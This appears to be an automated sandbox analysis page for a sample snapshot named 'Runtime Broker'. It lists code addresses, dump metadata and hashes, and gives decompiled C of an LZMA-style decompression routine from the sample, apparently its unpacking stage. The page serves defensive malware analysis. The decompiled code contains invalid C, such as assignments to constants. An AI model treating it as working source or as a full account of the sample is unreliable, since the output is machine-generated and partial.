0x00406d19
0x00406d1c
0x00406d1f
0x00000000
0x00000000
0x00406d25
0x00406d2b
0x00000000
0x00000000
0x00406d31
0x00406d31
0x00406d35
0x00406d38
0x00406d3b
0x00406d3e
0x00406d41
0x00406d42
0x00406d45
0x00406d47
0x00406d4d
0x00406d50
0x00406d53
0x00406d56
0x00406d59
0x00406d5c
0x00406d5f
0x00406d7b
0x00406d7e
0x00406d81
0x00406d84
0x00406d8b
0x00406d8f
0x00406d91
0x00406d95
0x00406d61
0x00406d61
0x00406d65
0x00406d6d
0x00406d72
0x00406d74
0x00406d76
0x00406d76
0x00406d98
0x00406d9f
0x00406da2
0x00000000
0x00406da8
0x00000000
0x00406da8
0x00000000
0x00406dad
0x00406dad
0x00406db1
0x00407471
0x00000000
0x00407471
0x00406db7
0x00406dba
0x00406dbd
0x00406dc1
0x00406dc4
0x00406dca
0x00406dcc
0x00406dcc
0x00406dcc
0x00406dcf
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd8
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406de0
0x00406de3
0x00406de6
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df5
0x00406df8
0x00406e10
0x00406e13
0x00406e16
0x00406e19
0x00406e19
0x00406e1c
0x00406e20
0x00406e22
0x00406dfa
0x00406dfa
0x00406e02
0x00406e07
0x00406e09
0x00406e0b
0x00406e0b
0x00406e25
0x00406e2c
0x00406e2f
0x00000000
0x00406e31
0x00000000
0x00406e31
0x00406e2f
0x00406e36
0x00406e36
0x00406e36
0x00406e36
0x00000000
0x00000000
0x00406e71
0x00406e71
0x00406e75
0x0040747d
0x00000000
0x0040747d
0x00406e7b
0x00406e7e
0x00406e81
0x00406e85
0x00406e88
0x00406e8e
0x00406e90
0x00406e90
0x00406e90
0x00406e93
0x00406e96
0x00406e96
0x00406e9c
0x00406e3a
0x00406e3a
0x00406e3d
0x00000000
0x00406e3d
0x00406e9e
0x00406e9e
0x00406ea1
0x00406ea4
0x00406ea7
0x00406eaa
0x00406ead
0x00406eb0
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ed4
0x00406ed7
0x00406eda
0x00406edd
0x00406edd
0x00406ee0
0x00406ee4
0x00406ee6
0x00406ebe
0x00406ebe
0x00406ec6
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ee9
0x00406ef0
0x00406ef3
0x00000000
0x00406ef5
0x00000000
0x00406ef5
0x00000000
0x00407182
0x00407182
0x00407186
0x004074ad
0x00000000
0x004074ad
0x0040718c
0x0040718f
0x00407192
0x00407196
0x00407199
0x0040719f
0x004071a1
0x004071a1
0x004071a1
0x004071a4
0x00000000
0x00000000
0x00406f52
0x00406f52
0x00406f55
0x004072c7
0x004072c7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734e
0x00407352
0x00407370
0x00407370
0x00407370
0x00407377
0x0040737e
0x00000000
0x0040737e
0x00407354
0x00407357
0x0040735a
0x0040735d
0x00407364
0x00000000
0x00000000
0x0040743f
0x00407442
0x00407343
0x00407343
0x00000000
0x00000000
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00407090
0x00407093
0x00407096
0x00407098
0x0040709a
0x0040709a
0x0040709b
0x0040709e
0x004070a5
0x004070a8
0x004070b6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739f
0x004074d7
0x00000000
0x004074d7
0x004073a5
0x004073a8
0x004073ab
0x004073af
0x004073b2
0x004073b8
0x004073ba
0x004073ba
0x004073ba
0x004073bd
0x004073c0
0x004073c0
0x004073c0
0x004073c0
0x00000000
0x00000000
0x004070be
0x004070c1
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00406e40
0x00406e40
0x00406e44
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00000000
0x00000000
0x00406fcb
0x00406fcb
0x00406fcf
0x00407495
0x00000000
0x00407495
0x00406fd5
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407001
0x00407004
0x00407006
0x00407006
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x00407009
0x00407009
0x00000000
0x00407009
0x0040728a
0x004074bf
0x004074e1
0x004074e7
0x004074e9
0x004074f0
0x004074f2
0x004074f9
0x004074fd
0x00000000
0x00406aee
0x004074f6
0x004074f6
0x00000000
0x004074f6
0x00407343
0x004073c9
0x004073cf
0x004073d2
0x004073d5
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073ea
0x00407403
0x00407406
0x00407409
0x0040740c
0x00407410
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073f4
0x004073f9
0x004073fb
0x004073fe
0x004073fe
0x00407420
0x00000000
0x00407422
0x00000000
0x00407422
0x00407420
0x00000000
0x00407295

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA7, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FA7() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074FE))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
